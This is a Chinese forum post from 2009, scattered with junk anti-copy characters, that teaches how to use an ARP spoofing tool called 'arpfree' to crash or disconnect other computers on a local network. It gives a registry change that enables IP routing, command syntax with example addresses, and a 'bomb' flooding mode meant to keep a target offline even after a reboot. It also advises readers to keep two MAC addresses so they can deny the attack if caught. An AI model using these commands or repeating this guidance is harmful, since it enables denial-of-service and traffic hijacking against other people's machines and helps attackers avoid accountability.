TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
本帖最后由 秋风舞落叶 于 2009-11-26 22:08 编辑
9 i4 C" J. g; W4 _6 d6 U& J# ?' q! u J$ m& [* r6 G# ^3 h4 D9 y( I
事先声明,如果出了什么问题,可别找我哦 祝你们好运。提示:准备两个MAC地址,这样就算找到你不承认就OK了,IP是随时可以换的,MAC可不是随便换的哦!
+ }3 Y( r1 k% w. c8 U& V6 Q( g教你让内网任何一台电脑死机,如果你有大量的计算机效果更好!3 z9 e" k1 E" r- y+ T
开始忘记说了,要使用ARP欺骗,必须启动ip路由功能,修改(添加注册表选项:/ h) }( a% W5 P# T2 i
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
0 `( F) x7 u. ]6 Q( D, m( B7 Y" x9 H有的朋友发现打开网卡失败,原因可能就是这个.
0 ]0 ]8 u2 {$ i( J; ^8 h, v, _& A发送的时候可以选择ARP的TYPE。如果是ARP请求报文,则只要输入要问的IP地址
1 ]. t: I" N( U* ^ A% ~1 l如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址
" m; Z/ c" Q* z6 V' F m* @3 X$ ^最后的发送速度可选参数为:(大小写敏感..我觉得挺不好的)
1 {# B8 P& @& m% r; W, S" ]fast----------最快0 u2 x6 {( v3 `; h5 W9 Y1 e7 c
hear---------每60MS一个包(可能是比较适合结合SNIFFER做监听)1 M, h: _3 W, g% x- v: u
slowhear---每500MS一个包+ i4 G+ } }' o+ e5 }3 Q0 B
auto---------每1秒一个包
3 m# F, F3 O* J: f, _6 a$ Islow---------每2秒个包4 Z: g+ M) C$ a. ]3 d! W( g Y6 k
使用方法如下:
4 r" e$ T( C0 s/ V***********************************************************************
! P# O' j& \: C8 F) u. q* (1)Send arp packet in "request mode" Examples:
* l* o9 T" Z0 Z: Q6 I* arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
" Z+ l) A4 w/ l* | | | | | p( _2 E! Q9 ^
* your mac address | | | |
2 b9 k6 D; a d2 g3 P) I, ^* destnation mac | | speed
( O( t+ [2 p9 W, r& f* arp type |
' F1 w7 C6 d: m1 r" @* |
! d% A% J& S" v* your ip address 6 z# h2 R4 A! R2 `: ]( P5 ~
***********************************************************************
* j: Z* d1 g+ Q0 |" y* (2)Send arp packet in "reply mode" Examples: + Z- H* U. R. h- n
* arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto ; I( p; u# ]6 D( W8 x) Z
* | | | | | | 8 {( X& c$ s& R
* your mac address | | | | |
6 C/ y- x1 }8 y, E6 x; Q* destnation mac | | | speed
) E& n5 x( W' T1 |! a9 G8 x/ i, @* arp type | | 6 B q. `6 _) n- h/ ~# {/ u; ]
* | |
, z. ~$ @3 s6 `& c6 N* your ip address | - c* {. l8 X3 u# y! }+ ^0 F
* |
m6 `2 N; t7 D. [* the ip address of destnation mac
! s4 B* `1 ]3 F o r5 e/ t) M***********************************************************************( | f* @* S7 x/ j- r& R8 P; u
补充:反击“LAN终结者”的办法:
- }- Z5 o; ?1 F6 Y+ g2 G反击“终结者”有几个办法:
8 i5 _5 p: o3 m1:发动比他更强烈的攻击:: ~: p% j, D. ]; {* h
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast9 R3 F4 C/ @' e6 K
|7 q& o& V; c, i j5 p
|& |0 f o3 c# }6 N5 S
这里是你想攻击的人的IP地址# \8 P; b0 B. P7 {$ R8 e) L
2:交换机竞争:* m6 `, i3 d1 \7 o' h* q" w
arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
8 Z3 J" F, C4 X% X" X|
& U" m$ q. |( F% U|
" A) q4 l0 l! q2 p1 C( w p6 O这里是你想攻击的人的MAC地址
$ t: v j. y, {, ?9 W1:情况将导致他IP地址冲突(比“终结者”来的猛烈多了)
+ ^) `7 u8 B* v, ?2:情况将使得他无法连接网络由于交换机把他的流量都给你了)
# I. d1 v) d/ q2 W/ c" O+ }0 Y———————————更-----新----消-----息—————————————————————
& @/ V x! }# ?7 h2 \8 S4 f8 u: L因为有朋友反映在非交换环境下,如使用HUB的情况下,无法对目标进行打击. \3 L, f! j( J6 ^0 d$ \
增加参数“bomb”,使用方法如下:3 t* l4 q: S5 ~/ o7 i! c
假设,目标为IP:192.168.237.109 目标mac为:011a8575a436; n) f, x8 E% e7 ]7 L' h
攻击命令如下:
) n; _# t$ i5 Barpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb 5 ^. w, B9 d$ e# `1 s9 o
其实就是进行简单的ARP DOS攻击,快速刷新目标的ARP缓存,可以在消耗自身较少系统资源的情况下1 {) R8 N- ~- P1 b
造成和PDOS工具类似的效果,并且如果你不停止攻击,对方重启以后也无法正常进入系统# y% ?, e# M- u
(当然前提是他没拔网线)。 |
|
/1 
IP卡
狗仔卡
发表于 2009-11-26 10:26:56
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡